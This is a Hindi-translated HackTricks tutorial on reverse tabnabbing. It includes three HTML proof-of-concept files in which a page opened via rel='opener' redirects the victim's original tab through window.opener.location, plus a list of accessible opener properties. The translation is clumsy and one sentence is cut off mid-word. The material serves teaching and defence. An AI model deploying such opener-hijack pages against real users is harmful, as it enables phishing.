6.3 KiB
जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!
HackTricks का समर्थन करने के अन्य तरीके:
- अगर आप अपनी कंपनी की विज्ञापनित करना चाहते हैं HackTricks में या HackTricks को PDF में डाउनलोड करना चाहते हैं तो सब्सक्रिप्शन प्लान्स देखें!
- आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें
- हमारे विशेष NFTs कलेक्शन, The PEASS Family खोजें
- शामिल हों 💬 डिस्कॉर्ड ग्रुप या टेलीग्राम ग्रुप या हमें ट्विटर 🐦 @carlospolopm** पर फॉलो** करें।
- अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके HackTricks और HackTricks Cloud github repos में।
विवरण
एक स्थिति में जहाँ एक हमलावर एक <a टैग के href आर्ग्यूमेंट को नियंत्रित कर सकता है जिसमें target="_blank" rel="opener" विशेषता है जिसे किसी पीड़ित द्वारा क्लिक किया जाएगा, तो हमलावर इस लिंक को अपने नियंत्रण वाली वेब पर (एक हानिकारक वेबसाइट) दिखा सकता है। फिर, जब पीड़ित लिंक पर क्लिक करता है और हमलावर की वेबसाइट तक पहुंचता है, तो यह हानिकारक वेबसाइट **जावास्क्रिप्ट ऑब्ज
<!DOCTYPE html>
<html>
<body>
<h1>Victim Site</h1>
<a href="http://127.0.0.1:8000/malicious.html" target="_blank" rel="opener">Controlled by the attacker</a>
</body>
</html>
{% endcode %}
{% code title="malicious.html" %}
<!DOCTYPE html>
<html>
<body>
<script>
window.opener.location = "http://127.0.0.1:8000/malicious_redir.html";
</script>
</body>
</html>
{% endcode %}
{% code title="malicious_redir.html" %}
<!DOCTYPE html>
<html>
<body>
<h1>New Malicious Site</h1>
</body>
</html>
पहुंचने योग्य गुणसूचियाँ
जब क्रॉस-स्थानीय पहुंचन (विभिन्न डोमेनों के बीच पहुंचन) होती है, तो एक दुर्भाग्यपूर्ण साइट द्वारा पहुंची जा सकने वाली विंडो जावास्क्रिप्ट क्लास उदाहरण की गुणसूचियों को निम्नलिखित तक ही सीमित किया जाता है, जिनमें से कुछ निम्नलिखित हैं:
opener.closed: इस गुणसूची का उपयोग इसका निर्धारण करने के लिए किया जाता है कि क्या एक विंडो बंद की गई है, जो एक बूलियन मान लौटाता है।opener.frames: यह गुणसूची मौजूदा विंडों के सभी आईफ्रेम तत्वों तक पहुंच प्रदान करती है।opener.length: इस गुणसूची द्वारा मौजूदा विंडों में मौजूद आईफ्रेम तत्वों की संख्या लौटाई जाती है।opener.opener: वर्तमान विंडो को खोलने वाली विंडो का संदर्भ इस गुणसूची के माध्यम से प्राप्त किया जा सकता है।opener.parent: यह गुणसूची वर्तमान विंडो के माता-पिता विंडो को लौटाती है।opener.self: इस गुणसूची द्वारा वर्तमान विंडो खुद का पहुंच प्रदान किया जाता है।opener.top: यह गुणसूची सबसे ऊपरी ब्राउज़र विंडो को लौटाती है।
हालांकि, जब डोमेन समान होते हैं, तो दुर्भाग्यपूर्ण साइट को विंडो जावास्क्रिप्ट ऑब्जेक्ट संदर्भ द्वारा उजागर किए गए सभी गुणसूचियों तक पहुंच मिलती है।
रोकथाम
रोकथाम सूचनाएँ HTML5 Cheat Sheet में दर्ज की गई हैं।